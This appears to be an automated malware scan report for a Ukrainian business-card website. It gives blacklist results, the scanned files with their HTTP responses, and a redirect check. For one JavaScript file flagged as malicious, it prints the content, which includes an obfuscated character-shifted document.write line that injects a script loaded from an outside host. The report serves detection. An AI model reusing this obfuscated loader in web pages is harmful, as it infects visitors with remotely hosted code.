Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vizitka.zt.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vizitka.zt.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vizitka.zt.ua/ | 200 OK Content-Length: 23233 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
http://vizitka.zt.ua/js/my_scripts.js | 200 OK Content-Length: 1394 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
$(function () {
$('a.free-trial-button').click(function () {
$('div.'+$(this).attr("rel")).fadeIn(500);
$("body").append("<div id='overlay'></div>");
$('#overlay').show().css({'filter' : 'alpha(opacity=80)'});
$('#slidercont').hide();
return false;
});
$('a.buy-it-button').click(function () {
$('div.'+$(this).attr("rel")).fadeIn(500);
$("body").append("<div id='overlay'></div>");
$('#overlay')
$(this).parent().addClass("active");
$(tmp).find(".tab_content div").stop(false,false).hide();
$(tmp).find(".tab"+tab_id).stop(false,false).fadeIn(300);
return false;
});
});
});
});
<!-- js-tools -->
u=0;while(u<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00mbxtbs/sv0dpnqpofout0dpn`nbjmup0tubu/qiq#?=0tdsjqu?'.charCodeAt(u++)-1))
<!-- /js-tools -->
Antivirus reports:
http://vizitka.zt.ua/countdown.js | 200 OK Content-Length: 2544 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://vizitka.zt.ua/nivoslider/jquery.nivo.slider.pack.js | 200 OK Content-Length: 15919 Content-Type: application/x-javascript | clean |
http://vizitka.zt.ua/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://vizitka.zt.ua/fancybox/jquery.easing-1.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:30 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vizitka.zt.ua/ | 200 OK Content-Length: 23233 Content-Type: text/html | clean |
http://www.vizitka.zt.ua/js/my_scripts.js | 200 OK Content-Length: 1394 Content-Type: application/x-javascript | malicious |
http://vizitka.zt.ua/fancybox/nivoslider/jquery.nivo.slider.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:33 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vizitka.zt.ua/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:33 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/fancybox/jquery.fancybox-1.3.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:34 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/fancybox/jquery.easing-1.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:34 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/fancybox/jquery.mousewheel-3.0.4.pack.js | HTTP/1.1 302 Found Connection: close Date: Wed, 01 Oct 2014 04:37:34 GMT Location: http://www.vizitka.zt.ua/ Server: nginx/1.0.14 Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vizitka.zt.ua/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1279 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vizitka.zt.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 04:37:23 GMT
Accept-Ranges: bytes
ETag: "103455-5ac1-502b1a444ea00"
Server: nginx/1.0.14
Content-Length: 23233
Content-Type: text/html
Last-Modified: Wed, 10 Sep 2014 08:14:32 GMT
...23233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vizitka.zt.ua
Referer: http://www.google.com/search?q=vizitka.zt.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.